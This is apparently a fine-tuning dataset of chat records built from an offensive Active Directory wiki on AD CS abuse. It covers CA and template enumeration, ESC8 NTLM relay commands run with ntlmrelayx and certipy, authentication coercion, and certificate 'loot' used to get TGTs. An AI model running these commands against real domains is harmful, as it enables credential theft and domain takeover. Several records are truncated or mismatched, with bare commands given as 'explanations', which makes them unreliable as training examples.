'DC=ADLAB,DC=LOCAL'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Enumerates all Certificate Authorities in the 'ADLAB.LOCAL' domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CAs' -SearchBase 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 182, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Enumerates all Certificate Authorities in the 'ADLAB.LOCAL' domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CAs' -SearchBase 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Enumerates all Certificate Authorities in the 'ADLAB.LOCAL' domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CAs' -SearchBase 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 182, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Enumerates all Certificate Templates in the 'ADLAB.LOCAL' domain"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CertificateTemplates' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Enumerates all Certificate Templates in the 'ADLAB.LOCAL' domain", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CertificateTemplates' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::", "metadata": {"corpus_index": 183, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Enumerates all Certificate Templates in the 'ADLAB.LOCAL' domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CertificateTemplates' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Enumerates all Certificate Templates in the 'ADLAB.LOCAL' domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CertificateTemplates' -SearchBase 'DC=ADLAB,DC=LOCAL'\n```\n\n:::", "metadata": {"corpus_index": 183, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate Services (AD-CS) - Abuse?"}, {"role": "assistant", "content": "The different domain escalation scenarios are detailed in the following parts.\n\n- ESC1 to ESC3, ESC9, ESC10, ESC13, ESC14 and ESC15: Certificate Templates\n- ESC6 and ESC12: Certificate Authority\n- ESC4, ESC5 & ESC7: Access Controls\n- ESC8, ESC11: Unsigned Endpoints"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate Services (AD-CS) - Abuse?", "response": "The different domain escalation scenarios are detailed in the following parts.\n\n- ESC1 to ESC3, ESC9, ESC10, ESC13, ESC14 and ESC15: Certificate Templates\n- ESC6 and ESC12: Certificate Authority\n- ESC4, ESC5 & ESC7: Access Controls\n- ESC8, ESC11: Unsigned Endpoints", "metadata": {"corpus_index": 184, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate Services (AD-CS) - Abuse"}, {"role": "assistant", "content": "The different domain escalation scenarios are detailed in the following parts.\n\n- ESC1 to ESC3, ESC9, ESC10, ESC13, ESC14 and ESC15: Certificate Templates\n- ESC6 and ESC12: Certificate Authority\n- ESC4, ESC5 & ESC7: Access Controls\n- ESC8, ESC11: Unsigned Endpoints"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate Services (AD-CS) - Abuse", "response": "The different domain escalation scenarios are detailed in the following parts.\n\n- ESC1 to ESC3, ESC9, ESC10, ESC13, ESC14 and ESC15: Certificate Templates\n- ESC6 and ESC12: Certificate Authority\n- ESC4, ESC5 & ESC7: Access Controls\n- ESC8, ESC11: Unsigned Endpoints", "metadata": {"corpus_index": 184, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Unsigned endpoints - Theory work?"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on web endpoints vulnerable to NTLM relay attacks. The escalation vector was dubbed ESC8.\n\n> AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install \\[(The certificate enrollment web interface, Certificate Enrollment Service (CES), Network Device Enrollment Service (NDES)).]\n>\n> \\[...]\n>\n> These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the \"User\" or \"Machine\" certificate templates.\n>\n> (specterops.io)\n\nFollowing this, Sylvain Heiniger from Compass Security has found a similar vulnerability on the AD CS RPC enrollment endpoint. As described in his article, each RPC interface checks the NTLM signature independently.\n\nFor certificate request purposes, the MS-ICPR (ICertPassage Remote Protocol) RPC interface is used. According to the Microsoft documentation, packet privacy is enabled if the IF_ENFORCEENCRYPTICERTREQUEST flag is set (default configuration), meaning that NTLM relay attacks are not possible.\n\nThese attacks, like all NTLM relay attacks, require a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, see MITM and coerced authentication coercion techniques. Once the incoming authentication is received by the attacker, it can be relayed to an AD CS web endpoint.\n\nOnce the relayed session is obtained, the attacker poses as the relayed account and can request a client authentication certificate. The certificate template used needs to be configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Unsigned endpoints - Theory work?", "response": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on web endpoints vulnerable to NTLM relay attacks. The escalation vector was dubbed ESC8.\n\n> AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install \\[(The certificate enrollment web interface, Certificate Enrollment Service (CES), Network Device Enrollment Service (NDES)).]\n>\n> \\[...]\n>\n> These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the \"User\" or \"Machine\" certificate templates.\n>\n> (specterops.io)\n\nFollowing this, Sylvain Heiniger from Compass Security has found a similar vulnerability on the AD CS RPC enrollment endpoint. As described in his article, each RPC interface checks the NTLM signature independently.\n\nFor certificate request purposes, the MS-ICPR (ICertPassage Remote Protocol) RPC interface is used. According to the Microsoft documentation, packet privacy is enabled if the IF_ENFORCEENCRYPTICERTREQUEST flag is set (default configuration), meaning that NTLM relay attacks are not possible.\n\nThese attacks, like all NTLM relay attacks, require a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, see MITM and coerced authentication coercion techniques. Once the incoming authentication is received by the attacker, it can be relayed to an AD CS web endpoint.\n\nOnce the relayed session is obtained, the attacker poses as the relayed account and can request a client authentication certificate. The certificate template used needs to be configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose", "metadata": {"corpus_index": 185, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Unsigned endpoints - Theory?"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on web endpoints vulnerable to NTLM relay attacks. The escalation vector was dubbed ESC8.\n\n> AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install \\[(The certificate enrollment web interface, Certificate Enrollment Service (CES), Network Device Enrollment Service (NDES)).]\n>\n> \\[...]\n>\n> These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the \"User\" or \"Machine\" certificate templates.\n>\n> (specterops.io)\n\nFollowing this, Sylvain Heiniger from Compass Security has found a similar vulnerability on the AD CS RPC enrollment endpoint. As described in his article, each RPC interface checks the NTLM signature independently.\n\nFor certificate request purposes, the MS-ICPR (ICertPassage Remote Protocol) RPC interface is used. According to the Microsoft documentation, packet privacy is enabled if the IF_ENFORCEENCRYPTICERTREQUEST flag is set (default configuration), meaning that NTLM relay attacks are not possible.\n\nThese attacks, like all NTLM relay attacks, require a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, see MITM and coerced authentication coercion techniques. Once the incoming authentication is received by the attacker, it can be relayed to an AD CS web endpoint.\n\nOnce the relayed session is obtained, the attacker poses as the relayed account and can request a client authentication certificate. The certificate template used needs to be configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Unsigned endpoints - Theory?", "response": "In their research papers, Will Schroeder and Lee Christensen found a domain escalation vector based on web endpoints vulnerable to NTLM relay attacks. The escalation vector was dubbed ESC8.\n\n> AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install \\[(The certificate enrollment web interface, Certificate Enrollment Service (CES), Network Device Enrollment Service (NDES)).]\n>\n> \\[...]\n>\n> These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the \"User\" or \"Machine\" certificate templates.\n>\n> (specterops.io)\n\nFollowing this, Sylvain Heiniger from Compass Security has found a similar vulnerability on the AD CS RPC enrollment endpoint. As described in his article, each RPC interface checks the NTLM signature independently.\n\nFor certificate request purposes, the MS-ICPR (ICertPassage Remote Protocol) RPC interface is used. According to the Microsoft documentation, packet privacy is enabled if the IF_ENFORCEENCRYPTICERTREQUEST flag is set (default configuration), meaning that NTLM relay attacks are not possible.\n\nThese attacks, like all NTLM relay attacks, require a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, see MITM and coerced authentication coercion techniques. Once the incoming authentication is received by the attacker, it can be relayed to an AD CS web endpoint.\n\nOnce the relayed session is obtained, the attacker poses as the relayed account and can request a client authentication certificate. The certificate template used needs to be configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose", "metadata": {"corpus_index": 185, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Unsigned endpoints - Web endpoint (ESC8) work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC8 escalation scenario.\n\n``bash\nntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify enabled HTTP endpoint (how to enumerate).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Unsigned endpoints - Web endpoint (ESC8) work?", "response": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC8 escalation scenario.\n\n``bash\nntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify enabled HTTP endpoint (how to enumerate).\n\n``bash", "metadata": {"corpus_index": 186, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Unsigned endpoints - Web endpoint (ESC8)?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC8 escalation scenario.\n\n``bash\nntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify enabled HTTP endpoint (how to enumerate).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Unsigned endpoints - Web endpoint (ESC8)?", "response": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC8 escalation scenario.\n\n``bash\nntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify enabled HTTP endpoint (how to enumerate).\n\n``bash", "metadata": {"corpus_index": 186, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ntlmrelayx command for unsigned endpoints - web endpoint (esc8)"}, {"role": "assistant", "content": "ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ntlmrelayx command for unsigned endpoints - web endpoint (esc8)", "response": "ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"", "metadata": {"corpus_index": 187, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Unsigned endpoints - Web endpoint (ESC8)"}, {"role": "assistant", "content": "ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Unsigned endpoints - Web endpoint (ESC8)", "response": "ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"", "metadata": {"corpus_index": 187, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"`?"}, {"role": "assistant", "content": "This command is used for unsigned endpoints - web endpoint (esc8). Web endpoint (ESC8)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx -t http://$PKI.domain.local/certsrv/certfnsh.asp --adcs --template \"Template name\"`?", "response": "This command is used for unsigned endpoints - web endpoint (esc8). Web endpoint (ESC8)", "metadata": {"corpus_index": 187, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does find ESC8-vulnerable CAs work?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC8"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does find ESC8-vulnerable CAs work?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC8", "metadata": {"corpus_index": 188, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on find ESC8-vulnerable CAs"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC8"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on find ESC8-vulnerable CAs", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC8", "metadata": {"corpus_index": 188, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about find and look through enabled templates for ones that could be used for authentication?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS).\n\n`batch\nCertify.exe cas\n``\n\n> [!WARNING]\n> If web endpoints are enabled, switch to UNIX because at the time of writing (October 20th, 2021), I don't know how to easily conduct the ESC8 abuse from Windows.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about find and look through enabled templates for ones that could be used for authentication?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS).\n\n`batch\nCertify.exe cas\n``\n\n> [!WARNING]\n> If web endpoints are enabled, switch to UNIX because at the time of writing (October 20th, 2021), I don't know how to easily conduct the ESC8 abuse from Windows.\n\n:::", "metadata": {"corpus_index": 189, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for find and look through enabled templates for ones that could be used for authentication?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS).\n\n`batch\nCertify.exe cas\n``\n\n> [!WARNING]\n> If web endpoints are enabled, switch to UNIX because at the time of writing (October 20th, 2021), I don't know how to easily conduct the ESC8 abuse from Windows.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for find and look through enabled templates for ones that could be used for authentication?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS).\n\n`batch\nCertify.exe cas\n``\n\n> [!WARNING]\n> If web endpoints are enabled, switch to UNIX because at the time of writing (October 20th, 2021), I don't know how to easily conduct the ESC8 abuse from Windows.\n\n:::", "metadata": {"corpus_index": 189, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute find and look through enabled templates for ones that could be used for authentication?"}, {"role": "assistant", "content": "> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n**2. Authentication coercion :chains:**\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. [PrinterBug](../mitm-and-coerced-authentications/ms-rprn.md), [PetitPotam](../mitm-and-coerced-authentications/ms-efsr.md), [PrivExchange](../exchange-services/privexchange.md)) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the [mitm-and-coerced-authentications](../mitm-and-coerced-authentications/) article for more insight.\n\n---\n\n**3. Loot :tada:**\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with [Pass-the-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and 